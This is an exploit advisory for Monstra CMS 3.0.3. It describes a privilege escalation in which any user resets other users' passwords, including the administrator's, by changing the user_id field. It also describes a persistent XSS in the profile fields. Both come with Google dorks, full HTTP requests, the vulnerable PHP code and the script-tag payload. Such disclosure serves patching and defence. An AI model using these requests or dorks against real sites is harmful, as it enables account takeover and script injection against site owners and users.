Monstra CMS 3.0.3 - Multiple Vulnerabilities



Exploit Title: Monstra CMS 3.0.3 - Privilege Escalation / Remote Password Change

Google Dork: intext:"Powered by Monstra"/users/registration
Date: 2016-03-28
Exploit Author: Sarim Kiani
Vendor Homepage: http://monstra.org
Software Link: http://monstra.org/download
Version: 3.0.3
Tested on: Windows OS

==================== TIMELINE ====================
- Discovery Date: March 16 2016
- Disclosed to Vendor: March 22 2016
- Vendor Fixed the Issue: March 27 2016
==================================================

Bug Tracking ID: Github Issue # 405
Link: https://github.com/monstra-cms/monstra/issues/405

Application Description: Monstra is a modern light weighted Content Management System written in php.

1. Vulnerability Description:

Any user can change credentials of other users including the Administrator credentials. This can allow the attacker to gain Administrator access and completely compromise the application.

Once logged in as a regular user or successfully registering as a new user, use the following URL to gain information (username) of other users:
http://localhost/monstra-3.0.3/users/1

The digit '1' is of Admin or first user created in the database. By changing the digit, all registered usernames can be found.

Then by using the 'Edit Profile' option of own user account, password of any other user including the Administrator can be changed by changing the POST parameters 'user_id', 'login' and 'new_password'.


2. Proof of Concept/Code Flaw:

`In file monstra\plugins\box\users\users.plugin.php

Function: getProfileEdit

Line No: 233

  if (Users::$users->update(Request::post('user_id'),
        array('login' => Security::safeName(Request::post('login')),
              'firstname' => Request::post('firstname'),
              'lastname'  => Request::post('lastname'),
              'email'     => Request::post('email'),
              'skype'     => Request::post('skype'),
              'about_me'  => Request::post('about_me'),
              'twitter'   => Request::post('twitter')))) {

            // Change password
            if (trim(Request::post('new_password')) != '') {
                Users::$users->update(Request::post('user_id'), array('password' => Security::encryptPassword(trim(Request::post('new_password')))));
            }

            Notification::set('success', __('Your changes have been saved.', 'users'));
            Request::redirect(Site::url().'/users/'.$user['id']);

On editing profile user id is taken from Request::post('user_id'). An attacker can provide any user id on change password funcionality

Users::$users->update --> updates the password`

Header:

> POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
Content-Length: 152
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/monstra-3.0.3/users/8/edit
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: COOKIE_SUPPORT=true; GUEST_LANGUAGE_ID=en_US; has_js=1; PHPSESSID=abtuklkn1r0rjbub01527gjav0; _ga=GA1.1.592562515.1457951975; login_attempts=i%3A4%3B

csrf=eb616fed8ca93d9de582a4f7d75ee3a3a0d6e3ec&user_id=8&login=user&firstname=&lastname=&email=&twitter=&skype=&about_me=&new_password=&edit_profile=Save

3. Solution:

Vendor has resolved the issue, use the patch 'User Security Fix # 406'.

Link: https://github.com/monstra-cms/monstra/pull/406/commits/2e2a22ee5aafa28771f87c108edea024b618a8d5

##################################################################################

#Exploit Title: Monstra CMS 3.0.3 - Persistent XSS 
#Google Dork: intext:"Powered by Monstra"
#Date: 2016-03-16
#Exploit Author: Sarim Kiani
#Vendor Homepage: http://monstra.org
#Software Link: http://monstra.org/download
#Version: 3.0.3
#Tested on: Windows OS


Monstra is a modern light weighted Content Management System written in php.


1. Description

A Persistent XSS exists in the "Edit Profile" page of the application.


2. Proof of Concept

Any user entering personal information in the "Edit Profile" page of the application can insert XSS Payload in the Form.

Payload: "><script>alert(1);</script>

The following entries on the page are vulnerable to a Persistent XSS payload:

'Firstname', 'Lastname', 'Email', 'Twitter', 'Skype' and 'About Me'.

POST /monstra-3.0.3/users/8/edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/monstra-3.0.3/users/8/edit
Cookie: GUEST_LANGUAGE_ID=en_US; COOKIE_SUPPORT=true; SCREEN_NAME=5374564c7570434448716b3d; SESS7a361a010634612fb69871c3ab2715f1=05e_dlYEnDv4-n3tC89gHEXGp3l-L5CXZY7LNgxFIFg; docebo_session=an9dgdq6rmlg3bv5b29tj45653; PHPSESSID=no30picpa0c5khn86lmcd53cb5; _ga=GA1.1.739562915.1457952544
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 440

csrf=685bba70d144b8b8727937b56f5b87e669135fe1&user_id=8&login=user&firstname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&lastname=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&email=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&twitter=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&skype=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&about_me=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&new_password=&edit_profile=Save


3.Solution

No newer (fixed) versions are currently available.